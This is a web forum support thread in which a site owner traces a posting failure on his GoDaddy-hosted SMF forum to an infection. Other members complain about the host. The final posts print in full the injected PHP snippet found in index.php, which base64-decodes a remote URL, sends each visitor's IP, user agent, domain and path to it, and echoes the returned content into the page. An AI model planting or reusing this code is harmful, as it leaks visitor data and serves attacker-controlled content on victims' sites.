Can't post anything: "The connection was reset"

Started by backend, July 23, 2014, 11:11:52 AM

Previous topic - Next topic

Illori

backend

Ok so here is something strange.

I found a loophole that finally allows me to post to my forum : using the iPhone app 'Tapatalk' I was shocked to find out that I can post with no problem.

Meanwhile , I still can't post using a browser.

Of course, this is not the solution to my problem, but maybe it can help us find a solution. In other words, why am I able to post from an iPhone app and not from a browser? How can we use that to solve the problem at hand, if at all?

backend

Quote from: backend on August 02, 2014, 01:11:33 AM
Ok so here is something strange.

I found a loophole that finally allows me to post to my forum : using the iPhone app 'Tapatalk' I was shocked to find out that I can post with no problem.

Meanwhile , I still can't post using a browser.

Of course, this is not the solution to my problem, but maybe it can help us find a solution. In other words, why am I able to post from an iPhone app and not from a browser? How can we use that to solve the problem at hand, if at all?

So, anyone got a clue on this please?

backend

Ok, so after being patient for some +3 weeks, they have finally resolved the issue. But I am not really sure what the issue was and their email below is very vague. I did reply asking them to explain what the issue was and I am still waiting:

The issue with your Authorize.net transactions on your two secondary domains has been addressed and resolved. If this issue re-occurs, or you experience any other problems please let us know and we would be happy to assist you further. We appreciate your patience and understanding in this matter.

First of all, what a hell is Authorize.net? I have never used it on my website and have no idea what it is. Second of all, what do they mean 'two domain names'? Sure I have a few domain names hosted with them but what does that have to do with this issue?

It is as if they are talking about a completely different issue or client.

I hope to call them later this week to clarify what the issue was.

backend

Damn it, I think I spoke too soon! After working for almost two days with no problem, it has stopped working again now, damn it!  Same issue again....

Hope it is temporary...

backend

Quote from: K@ on August 14, 2014, 04:11:49 PM
How's this going, now?

Hi there, not sure if you read my last 3 posts or so, they fixed the problem, only for it to come back again about 48 hours later.

Now I am in touch with them again.

Will keep you guys updated.

kat

Might be best to bite the bullet and give godaddy the flick...

backend

It has now been a 40 days and still have this issue.

Spoke to GoDaddy on Sunday and the rep said it is now with their 4th level support.

LiroyvH

40 days and you still haven't jumped ship?
GoDaddy is lucky to have such a loyal client, heh.
Considering they don't seem to be able to resolve the issue, I'd start considering my options.
((U + C + I)x(10 − S)) / 20xAx1 / (1 − sin(F / 10))
President/CEO of Simple Machines - Server Manager
Please do not PM for support - anything else is usually OK.

ARG01

Quote from: CoreISP on August 27, 2014, 09:46:47 PM
40 days and you still haven't jumped ship?
GoDaddy is lucky to have such a loyal client, heh.
Considering they don't seem to be able to resolve the issue, I'd start considering my options.

Couldn't have said it better myself. I was with GD for about a year in the very beginning and had nothing but issues when it came to SMF and WP. Moved eight years ago and have not had one issue since.
No, I will not offer free downloads to Premium DzinerStuido themes. Please stop asking.

backend

Guys I have been with Godaddy for almost 14 years (SMF since 2005) and have never had any real problems. This is the first one and unfortunately it has been my worst ever.

Ninja ZX-10RR

Quote from: backend on August 27, 2014, 11:35:10 PM
Guys I have been with Godaddy for almost 14 years (SMF since 2005) and have never had any real problems. This is the first one and unfortunately it has been my worst ever.

2014-2005=9, not 14 actually... Anyway I think you have been really lucky if you check the whole forum you will find lots of topics made by angry people experiencing troubles because of GoDaddy's servers...
Quote from: BeastMode topic=525177.msg3720020#msg3720020
It's so powerful that on this post and even in the two PMs you sent me,you still answered my question very quickly and you're apologizing for the delay. You're the #1 support I've probably ever encountered man, so much respect for that. Thank you, and get better soon.

I'll keep this in my siggy for a while just to remind me that someone appreciated what I did while others didn't.

♥ Jess ♥

STOP EDITING MY PROFILE

Arantor

One can be a user on GoDaddy's servers without SMF, you know ;)

backend

As a website, been with GD for about 14 years.

As for SMF, I have had it with GD for about 9 years now.

Ninja ZX-10RR

And this makes me think I should go to bed, lol on that one :P

Anyway it doesn't change very much, you have been lucky ;)
Quote from: BeastMode topic=525177.msg3720020#msg3720020
It's so powerful that on this post and even in the two PMs you sent me,you still answered my question very quickly and you're apologizing for the delay. You're the #1 support I've probably ever encountered man, so much respect for that. Thank you, and get better soon.

I'll keep this in my siggy for a while just to remind me that someone appreciated what I did while others didn't.

♥ Jess ♥

STOP EDITING MY PROFILE

kat

Don't hold your breath... If you search for posts involving Godaddy, here, you'll see why... :(

backend

Guys, finally some good news!  :)

Got a reply back from GoDaddy telling me that some 23 pages on my website (not just SMF) were infected with some code. But they only gave me part of the code. I did some research and found the following code which others have complained about as well:

Quote<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics           
        $stCurlLink = base64_decode( 'aHR0cDovL2JvdHN0YXRpc3RpY3VwZGF0ZS5jb20vc3RhdC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            @$stCurlHandle = curl_init( $stCurlLink );
    }
    }
if ( $stCurlHandle !== NULL )
{
    curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 12);
    $sResult = @curl_exec($stCurlHandle);
    if ($sResult[0]=="O")
     {$sResult[0]=" ";
      echo $sResult; // Statistic code end
      }
    curl_close($stCurlHandle);
}
}
?>

I looked at my index.php and found it at the very bottom of the page.

When I deleted that part, the forums were back up and running like magic! I couldn't believe it, what a relief!!!!!!!!!!!

Now I just have to remove it from the other pages.

backend

Now here is my question: how can I make sure this doesn't happen again? is this happening through an SMF mod/theme or even WordPress Plugin? Where do you even start?

I have already changed my forum/cPanel/FTP passwords. What else can I do?

Advertisement: